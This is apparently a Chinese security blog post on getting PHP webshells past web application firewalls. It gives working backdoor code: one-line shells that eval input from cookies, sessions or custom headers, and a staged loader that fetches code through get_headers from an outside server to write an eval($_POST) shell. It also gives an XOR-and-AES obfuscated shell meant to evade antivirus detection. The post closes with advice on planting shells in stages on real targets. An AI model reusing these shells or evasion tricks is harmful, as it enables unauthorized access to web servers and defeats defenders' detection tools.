PHP利用某些函数bypass waf探讨

前言:

前几天写了一篇文章,由黑到白 这篇文章中用到echo的一个特性去一步一步写马
image.png看师傅们的评论然后去研究了下原因
学到了很多
比如linux写shell少了
POST的原因和解决思路如下还有就是base64不存在的原因以及wget和nc为啥反弹不了的原因
image.png
也在这里发觉到了一个师傅说的一个问题点, P O S T 空 格 以 及 _POST 空格以及 POST这些字符都写不进去 也恰好看到了微信公众号里面有个师傅写了篇文章
image.png
链接如下
https://mp.weixin.qq.com/s/hRwYtDZ-dqqznhS3LdSxUA
里面提到了一个tips
利用get_headers绕过了waf 顿时引来了自己的兴趣,因为目前的很多waf是基于post包和get包来拦截的 如果我把参数内容可控到header头里面不就能稳稳的过了嘛
就开始研究了下这种tips用于实战,发觉还是蛮有趣的这里分享给大家

正文

原理的话:个人理解的话感觉跟中转马有点像 这是这个可以突破的限制条件更多。

1.代码层次过滤了post以及get

这种绕过蛮简单的 直接把参数去session或者cookie中或者headers中即可绕过了

#cookie传参
<?php
eval(base64_decode($_COOKIE["PHPSESSID"]));
?>
  
#session传参
  <?php

eval($_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]));

?>

image.png

2.代码层过滤了$ _ POST GET内容

思路方法1

利用getallheadrs去绕过
适用于php版本大于5.5以上的

<?php
  session_start();

eval(getallheaders()['Demo']);

?>

5.5以下的好像不存在这个函数
image.png
5.5以上的
image.png

思路方法2

利用get_headers
服务器内容如下(后面的base64里面的可变成想要的如冰蝎的base64加密也可)

<?php
header('assert');
header("file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7ID8+'))");

马内容如下 适用于7.1以下 这个用的assert 如果要高版本适用的话直接指定eval和assert即可

<?php
$a=get_headers('http://服务器/1.php');
$b=str_replace(":","",$a[6]);
$b=str_replace(" ","",$b);
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
$b($x);
?>
<?php
$a=get_headers('http://服务器/1.php');
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
eval($x);
?>

然后访问3.php即可成功创建shell.php
image.png
d盾查杀效果1
image.png
这里没做免杀 想做静动态的免杀的话 其实也是可以的 稍微改下即可
可以结合这个加密算法改进下即可 动态即可过
给大家抛砖引玉扔一个加密算法+shellcode静态免杀的 动态可过60跟这个改即可
这个是加密算法a.php

<?php
$key1 = '123456';
$key = "password";
$fun = $_GET['func'];
for($i=0;$i<strlen($fun);$i++){
    $fun[$i] = $fun[$i]^$key[$i+1&7];
}
echo $fun;
$encrypt = openssl_encrypt($fun, 'AES-128-ECB', $key1, 0);
echo "加密后: ".$encrypt;
?>

这个是shellcode的
shell.php

 <?php

function b(){
    $x = "password";
    $key1 = '123456';
    $fun = openssl_decrypt($_GET['func'], 'AES-128-ECB', $key1, 0);
    for($i=0;$i<strlen($fun);$i++){
    $z= $fun[$i] ;
    $fun[$i] =$z^$x[$i+1&7];
}
return $fun;
}

function a(){
  eval(b());
}

a();

image.png

image.png
image.png

实战

结合追加的思路来组合打 一步一步写内容进去即可完成了
多次追加写入后把内容写进去后 然后进行访问即获取到shell了
image.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值